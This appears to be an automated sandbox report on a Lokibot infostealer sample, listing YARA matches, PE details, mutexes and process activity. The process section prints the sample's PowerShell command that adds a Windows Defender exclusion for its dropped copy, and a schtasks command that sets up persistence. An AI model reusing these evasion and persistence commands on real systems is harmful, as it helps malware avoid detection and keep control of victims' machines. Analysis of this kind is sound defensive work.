Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_06320918	9_2_06320918
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_063249D0	9_2_063249D0
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 9_2_063249C0	9_2_063249C0
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 12_2_0040549C	12_2_0040549C
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: 12_2_004029D4	12_2_004029D4

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Code function: String function: 00405B6F appears 42 times

Sample file is different than original file name gathered from version info

Source: gunzipped.exe, 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs gunzipped.exe
Source: gunzipped.exe, 00000000.00000002.1996175319.0000000005110000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs gunzipped.exe
Source: gunzipped.exe, 00000000.00000002.1994339680.00000000039C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs gunzipped.exe
Source: gunzipped.exe, 00000000.00000002.1994339680.0000000003968000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs gunzipped.exe
Source: gunzipped.exe, 00000000.00000002.1997330585.0000000005CC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs gunzipped.exe
Source: gunzipped.exe, 00000000.00000002.1992453854.000000000098E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs gunzipped.exe
Source: gunzipped.exe	Binary or memory string: OriginalFilenameEnYo.exeX vs gunzipped.exe

Uses 32bit PE files

Source: gunzipped.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.WiHDtnb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.gunzipped.exe.394e380.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.gunzipped.exe.3934360.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.gunzipped.exe.394e380.3.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.gunzipped.exe.3934360.2.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.WiHDtnb.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.gunzipped.exe.259d1b4.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1994339680.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1994339680.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: gunzipped.exe PID: 6400, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: WiHDtnb.exe PID: 3220, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: WiHDtnb.exe PID: 6148, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: gunzipped.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WiHDtnb.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, MDPgEsKDpcwVQ43E7V.cs	Security API names: _0020.SetAccessControl
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, MDPgEsKDpcwVQ43E7V.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, MDPgEsKDpcwVQ43E7V.cs	Security API names: _0020.AddAccessRule
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, h17c3NXtdNiUK364F8.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.gunzipped.exe.5cc0000.8.raw.unpack, h17c3NXtdNiUK364F8.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@18/13@0/1

Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe

Code function: 12_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

12_2_0040434D

Source: C:\Users\user\Desktop\gunzipped.exe

File created: C:\Users\user\AppData\Roaming\WiHDtnb.exe

Source: C:\Users\user\Desktop\gunzipped.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1436:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1892:120:WilError_03
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Mutant created: \Sessions\1\BaseNamedObjects\BWsWvjKaS

Source: unknown	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\WiHDtnb.exe C:\Users\user\AppData\Roaming\WiHDtnb.exe
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Process created: C:\Users\user\AppData\Roaming\WiHDtnb.exe "C:\Users\user\AppData\Roaming\WiHDtnb.exe"
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WiHDtnb.exe"	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WiHDtnb.exe	Process created: C:\Users\user\AppData\Roaming\WiHDtnb.exe "C:\Users\user\AppData\Roaming\WiHDtnb.exe"	Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Section loaded: amsi.dll	Jump to behavior
